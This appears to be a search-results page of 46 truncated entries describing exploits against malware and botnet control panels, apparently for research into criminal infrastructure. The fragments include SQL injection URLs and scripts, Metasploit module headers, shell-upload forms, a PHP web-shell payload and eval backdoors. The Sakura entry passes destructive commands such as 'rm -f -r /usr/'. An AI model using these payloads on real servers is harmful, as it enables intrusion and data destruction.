46 matches found
Malware exploit: Rovnix
Type: Hash Collision Author: Xylitol ?php / Defeat the weak hash function of Rovnix to get password from a hash. / $HASH = 'fbff791ef0770855e599ea6f87d41653'; $value = getNumber$HASH; $search = search$value, $HASH; echo'Hash: ' . $HASH . 'br /'; echo'Value: ' . $value . 'br /'; echo'Search: '...
Malware exploit: Legend
Type: Remote Code Execution Author: shipcod3 / Jay Turla This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include...
Malware exploit: Silence Winlocker
SQL injection. http://localhost/forma.php?pin=4322 http://localhost/index.php?x=1&act=delete&id=1 http://localhost/picture.php?pin=8787 http://localhost/tmp/get.php?pin=1334...
Malware exploit: Keitaro Tds
Keitaro TDS Type: Auth Bypass Author: Xylitol C Y B E R C R i M E W H Q Keitaro TDS Auth bypass v6.x - v7.7.10 Discovered on: 28/03/2014 Released on: 31/10/2016 1 go to...
Malware exploit: Smoke Loader
Type: SQLi http://localhost/control.php?id=1 http://localhost/guest.php?id=1 POST...
Malware exploit: Madnesspro
Type: SQLi Vuln: Author: bwall !/usr/bin/env python2 -- coding: utf-8 -- Exploit Title: Madness Pro = 1.14 SQL injection Date: June 05, 2014 Exploit Author: @botnethunter Version: 1.14 Tested on: Apache2 - Ubuntu - MySQL Unauthenticated SQL injection in Madness Pro panel = 1.14 Proof of Concept...
Malware exploit: Keybase
Type: Upload vulnerability Author: Unit42 import requests import sys if lensys.argv != 2: print "Usage: %s phpfile" % file sys.exit1 URL = "" print "Sending request..." multiplefiles = 'file', 'WIN-JJFOIJGL6514222.php', opensys.argv1, 'rb' r = requests.postURL + "image/upload.php",...
Malware exploit: Athena
Type: SQLi Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&countrycode=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now...
Malware exploit: Xdh
Type: Remote Code Execution Author: shipcod3 / Jay Turla This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include...
Malware exploit: Kaiten
Type: Remote Code Execution Author: shipcod3 / Jay Turla This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include...
Malware exploit: Zeus
Zeus & Zeus Evo Wikipedia Type: SQLi Vuln: http://localhost/gate.php?ip=8.8.8.8...
Malware exploit: Spyeye
Wikipedia Type: SQLi http://localhost/frmboa-grabbersub.php?dt=11%2F11%2F1998...
Malware exploit: RockLoader
Type: SQLi and shell file upload Author: Danail Velev Contact: ICQ: 209030 / [email protected] Website: http://colocation.bg/ Software: https://github.com/colocation/RockLoader-source Original Release: https://cxsecurity.com/ascii/WLB-2016070003...
Malware exploit: Atsengine
Type: Information Disclosure Author: Xylitol pre ?php $url = getURL; if $url !== NULL $database = @filegetcontents$url . '/db/database.db'; if $database !== FALSE fileputcontents'tmp.db', $database; $passwordmd5 = getOption'passwordmd5'; $pkey = getOption'pkey'; $jabberon = getOption'jabberon';...
Malware exploit: Cythosia
Type: Stored XSS and iFrame redirect Click add task Command: IFRAME SRC="whateverekorlemonpartyorwhatnot.com" /IFRAME Then Click Create Task Finally click Tasks. VOILA! Credits to asterea for finding this botnet panel...
Malware exploit: Filestealer
FileStealer v1.3 Type: Upload vulnerability Author: Xylitol !-- FileStealer v1.3 panel upload vulnerability -- !-- Panel hash: be19e93878130b2f57d42d4dcf5ffcf0 -- form method="POST" action="http://localhost/panel/up.php" enctype="multipart/form-data" File: input type="file" name="file" / br / HWI...
Malware exploit: Neutrino
Type: Blind SQL injection Author: Malwaretech import requests import time import sys waitdelay = 1 def brutelengthurl, field: for i in range0, 30: Injection = "/tasks.php?ip=1', IFLENGTHSELECT %s FROM users WHERE uid='1' = %d, SLEEP%d, 0, '1', '1', '1', '1', '1','1','1';--...
Malware exploit: Vertexnet
Type: Flood Bots Author: Xylitol !/usr/bin/perl VertexNet v1.1.1 Flood Bots http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791 Xyl2k! :þ use HTTP::Request; use LWP::UserAgent; $URL = "http://localhost/Panel/adduser.php";...
Malware exploit: Umbra
Type: SQLi Vuln: http://localhost/deletecommand.php?deleteID=1...
Malware exploit: Gorynych/DiamondFox
Gorynych/DiamondFox Type: File Upload Vulnerability Author: Xylitol Gorynych v4.2.0.257- File Upload Vulnerability Gorynych/DiamondFox v4.2.0.257 - File Upload Vulnerability File naming convention: file.log.php go to logs/dump/file.log.php file.jpg.php go to logs/scr/file.jpg.php file.LOG.php go to...
Malware exploit: Poisonivy
Type: Stack Buffer Overflow Author: Gal Badishi This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp def...
Malware exploit: Zskimmer
Type: SQLi Vuln: http://localhost/process.php?xy=2...
Malware exploit: Phoenix
Phoenix Exploit Kit Initial Discovery Type: Remote Code Execution Author: CrashBandicot/@DosPerl Tested on: MSWin32 Vuln file : geoip.php 492. isset$GET'bdr' ? eval$GET'bdr' : explode'nop','nop nop nop'; PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo; Screen :...
Malware exploit: Carberp
Type: Remote Code Execution Author: Xylitol table width="607" border="0" tr tdform method="POST" action="?php basename$SERVER'PHPSELF' ?" label for="carberp"Domain: /label input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" / input type="submit" name="button"...
Malware exploit: Solar
SQL injection. localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD...
Malware exploit: Sakura
Sakura Type: SQLi http://localhost/func.php?showtopic=2 http://localhost/index.php?showtopic=322 http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312 http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor...
Malware exploit: Xanity
Type: File Upload Author: Xiphos Research Ltd. TorCTPwn I was having a look at the C&C panel of the Xanity RAT for a bit of amusement, and noticed that it suffers an absurdly trivial shell upload vulnerability, outlined below. See: upload.php and note we can upload whatever the hell we want to a...
Malware exploit: Pbot
Type: Remote Code Execution Author: Juan Vasquez This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp...
Malware exploit: W3tw0rk
Type: Remote Code Execution Author: shipcod3 / Jay Turla This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include...
Malware exploit: Casinoloader
Dexter Casinoloader Type: SQLi Vuln: POSTDATA page=1&val=1 Type: SQLi POSTDATA page=1&val=1...
Malware exploit: Atrax
Type: Shell Upload Vulnerability Author: Xylitol import random import string import base64 import urllib import urllib2 CONFIG payload = 'pre?php ifisset$GET"c"system$GET"c";else echo"No input?";?/pre' url = 'http://localhost/atrax/' /CONFIG BOTMODEINSERT = 'b' BOT MODE BOTMODERUNPLUGIN = 'e'...
Malware exploit: DarkComet
DarkComet: Kevin Breen - DarkComet From Defense To Offense - Identify your Attacker; Slides; POC by Shawn Denbow and Jesse Herts; Wikipedia; Vulnerabilities: remote file read, database poisoning, SQL injection; DarkComet ToolKit; DarkComet Metasploit Module. Last updated on 14th Jan 2017...
Malware exploit: Ibanking
Type: Panel Upload Vulnerability Author: Xylitol !-- iBanking panel upload vulnerability -- !-- get.php?p=..&i=.&f=dbconfig.php -- form method="POST" action="http://localhost/smsbot/sendFile.php" enctype="multipart/form-data" FiLEZ: input type="file" name="uploadedfile" /br / input type="hidden"...
Malware exploit: Dendroid
Type: Remote Code Execution Author: Xylitol import requests Add URL Set a PHP payload Go to http://website/config.php URL = 'http://localhost/Panel/applysettings.php' PAYLOAD = "isset$GET'tapz' ? eval$GET'tapz' : '" data = 'dbhost' : 'localhost', 'dbname' : 'dendroid', 'dbusername' : 'root',...
Malware exploit: Soraya
Type: XSS Author: Xylitol import requests import time def StrToHexstring: hexstr='' for char in string: intchar = ordchar hexnum = hexintchar.lstrip"0x" hexstr+=hexnum return hexstr ConnectUrl = 'http://localhost/something/bot.php' UserString = 'rome0321' HtmlInject =...
Malware exploit: Herpes
Type: SQL Injection Author: bwall import random import pycurl import urllib import cStringIO import json def ui: try: return unicodei, errors='ignore' except: return i class HerpesNetPanel: def initself, gatewayurl: self.gatewayurl = gatewayurl @staticmethod def getfieldgateway, table, column, ro...
Malware exploit: Phase
Type: Blind SQL injection vulnerability Author: Xylitol ?php // Start with PHP CLI php pwn.php settimelimit0; // Adjust this : define'SLEEPTIME', '4'; define'PAGETIME', 4; define'URL', 'http://localhost/Phase/'; echo'attacking ' . URL . PHPEOL; getstring'username'; getstring'password'; function...
Malware exploit: Citadel
Type: Remote Code Execution Author: Xylitol import urllib import urllib2 Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability Work only on windows box def requesturl, params=None, method='GET': if method == 'POST': urllib2.urlopenurl, urllib.urlencodeparams.read elif method ==...
Malware exploit: Tinba
Wikipedia Type: SQLi \tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: botuid=1&botcomment=mate POST...
Malware exploit: Zemra
Type: Remote Code Execution Vuln: -a Author: shipcod3 / Jay Turla This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include...
Malware exploit: Madness Pro 1.14
Type: SQL Injection Author: bwall !/usr/bin/env python2 -- coding: utf-8 -- Exploit Title: Madness Pro = 1.14 SQL injection Date: June 05, 2014 Exploit Author: @botnethunter Version: 1.14 Tested on: Apache2 - Ubuntu - MySQL Unauthenticated SQL injection in Madness Pro panel = 1.14 Proof of Concep...
Malware exploit: Herpes Net 3.0
Type: SQL Injection Author: bwall import random import pycurl import urllib import cStringIO import json def ui: try: return unicodei, errors='ignore' except: return i class HerpesNetPanel: def initself, gatewayurl: self.gatewayurl = gatewayurl @staticmethod def getfieldgateway, table, column, ro...
Malware exploit: Filestealer 1.3
FileStealer v1.3 Type: Upload vulnerability Author: Xylitol !-- FileStealer v1.3 panel upload vulnerability -- !-- Panel hash: be19e93878130b2f57d42d4dcf5ffcf0 -- form method="POST" action="http://localhost/panel/up.php" enctype="multipart/form-data" File: input type="file" name="file" / br / HWI...
Malware exploit: Vertexnet V1.1.1
Type: Flood Bots Author: Xylitol !/usr/bin/perl VertexNet v1.1.1 Flood Bots http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791 Xyl2k! :þ use HTTP::Request; use LWP::UserAgent; $URL = "http://localhost/Panel/adduser.php";...
Malware exploit: Citadel Server V1.3.5.1
Type: Remote Code Execution Author: Xylitol import urllib import urllib2 Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability Work only on windows box def requesturl, params=None, method='GET': if method == 'POST': urllib2.urlopenurl, urllib.urlencodeparams.read elif method ==...
Malware exploit: Gorynych/DiamondFox V4.2.0.257
Type: File Upload Vulnerability Author: Xylitol !DOCTYPE html html head titleGorynych v4.2.0.257- File Upload Vulnerability/title !-- Panel.zip hash: e698cf7cc57b20c02fce6de83299b75b -- /head body h1 Gorynych/DiamondFox v4.2.0.257 - File Upload Vulnerability /h1 form...